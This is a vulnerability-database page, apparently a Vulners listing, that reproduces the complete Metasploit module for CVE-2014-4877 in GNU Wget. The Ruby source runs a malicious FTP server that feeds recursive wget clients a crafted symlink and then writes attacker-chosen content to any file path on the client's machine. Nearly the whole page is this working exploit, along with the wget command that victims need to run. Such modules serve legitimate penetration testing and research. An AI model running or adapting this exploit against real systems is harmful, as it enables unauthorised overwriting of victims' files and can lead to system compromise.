Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitHdm <[email protected]>MSF:AUXILIARY-SERVER-WGET_SYMLINK_FILE_WRITE-
HistoryOct 28, 2014 - 4:37 a.m.

GNU Wget FTP Symlink Arbitrary Filesystem Access

2014-10-2804:37:41
hdm <[email protected]>
www.rapid7.com
18
JSON

This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the β€œfile:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::FtpServer
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'           => 'GNU Wget FTP Symlink Arbitrary Filesystem Access',
      'Description'    => %q{
        This module exploits a vulnerability in Wget when used in
        recursive (-r) mode with a FTP server as a destination. A
        symlink is used to allow arbitrary writes to the target's
        filesystem. To specify content for the file, use the
        "file:/path" syntax for the TARGET_DATA option.

        Tested successfully with wget 1.14. Versions prior to 1.16
        are presumed vulnerable.
      },
      'Author'         => ['hdm'],
      'License'        => MSF_LICENSE,
      'Actions'        => [['Service', 'Description' => 'Run malicious FTP server']],
      'PassiveActions' => ['Service'],
      'References'     =>
        [
          [ 'CVE', '2014-4877'],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1139181' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access' ]
        ],
      'DefaultAction'  => 'Service',
      'DisclosureDate' => 'Oct 27 2014'
    )

    register_options(
      [
        OptString.new('TARGET_FILE', [ true,  "The target file to overwrite", '/tmp/pwned' ]),
        OptString.new('TARGET_DATA', [ true,  "The data to write to the target file", 'Hello from Metasploit' ]),
        OptPort.new('SRVPORT', [ true, "The port for the malicious FTP server to listen on", 2121])
      ])

      @fakedir = Rex::Text.rand_text_alphanumeric(rand(8)+8)
  end

  def run
    my_address = Rex::Socket.source_address
    print_good("Targets should run: $ wget -m ftp://#{my_address}:#{datastore['SRVPORT']}/")
    exploit()
  end

  def on_client_command_user(c,arg)
    @state[c][:user] = arg
    c.put "331 User name okay, need password...\r\n"
  end

  def on_client_command_pass(c,arg)
    @state[c][:pass] = arg
    c.put "230 Login OK\r\n"
    @state[c][:auth] = true
    print_status("#{@state[c][:name]} Logged in with user '#{@state[c][:user]}' and password '#{@state[c][:user]}'...")
  end

  def on_client_command_retr(c,arg)
    print_status("#{@state[c][:name]} -> RETR #{arg}")

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    unless arg.index(::File.basename(datastore['TARGET_FILE']))
      c.put "550 File does not exist\r\n"
      return
    end

    conn = establish_data_connection(c)
    if not conn
      c.put("425 Can't build data connection\r\n")
      return
    end

    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
    conn.put(datastore['TARGET_DATA'])
    c.put("226 Transfer complete.\r\n")
    conn.close

    print_good("#{@state[c][:name]} Hopefully wrote #{datastore['TARGET_DATA'].length} bytes to #{datastore['TARGET_FILE']}")
  end

  def on_client_command_list(c,arg)

    print_status("#{@state[c][:name]} -> LIST #{arg}")

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    conn = establish_data_connection(c)
    if not conn
      c.put("425 Can't build data connection\r\n")
      return
    end

    pwd = @state[c][:cwd]
    buf = ''

    dstamp = Time.at(Time.now.to_i-((3600*24*365)+(3600*24*(rand(365)+1)))).strftime("%b %e  %Y")
    unless pwd.index(@fakedir)
      buf << "lrwxrwxrwx   1 root     root           33 #{dstamp} #{@fakedir} -> #{::File.dirname(datastore['TARGET_FILE'])}\r\n"
      buf << "drwxrwxr-x  15 root     root         4096 #{dstamp} #{@fakedir}\r\n"
    else
      buf << "-rwx------   1 root     root    #{"%9d" % datastore['TARGET_DATA'].length} #{dstamp} #{::File.basename(datastore['TARGET_FILE'])}\r\n"
    end

    c.put("150 Opening ASCII mode data connection for /bin/ls\r\n")
    conn.put("total #{buf.length}\r\n" + buf)
    c.put("226 Transfer complete.\r\n")
    conn.close
  end

  def on_client_command_size(c,arg)

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    c.put("213 #{datastore['TARGET_DATA'].length}\r\n")
  end


  def on_client_command_cwd(c,arg)

    print_status("#{@state[c][:name]} -> CWD #{arg}")

    if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

    upath = "/"
    npath = ::File.join(@state[c][:cwd], arg)
    bpath = npath[upath.length, npath.length - upath.length]

    # Check for traversal above the root directory
    if not (npath[0, upath.length] == upath or bpath == '')
      bpath = '/'
    end

    bpath = '/' if bpath == ''
    @state[c][:cwd] = bpath

    c.put "250 CWD command successful.\r\n"
  end
end
JSON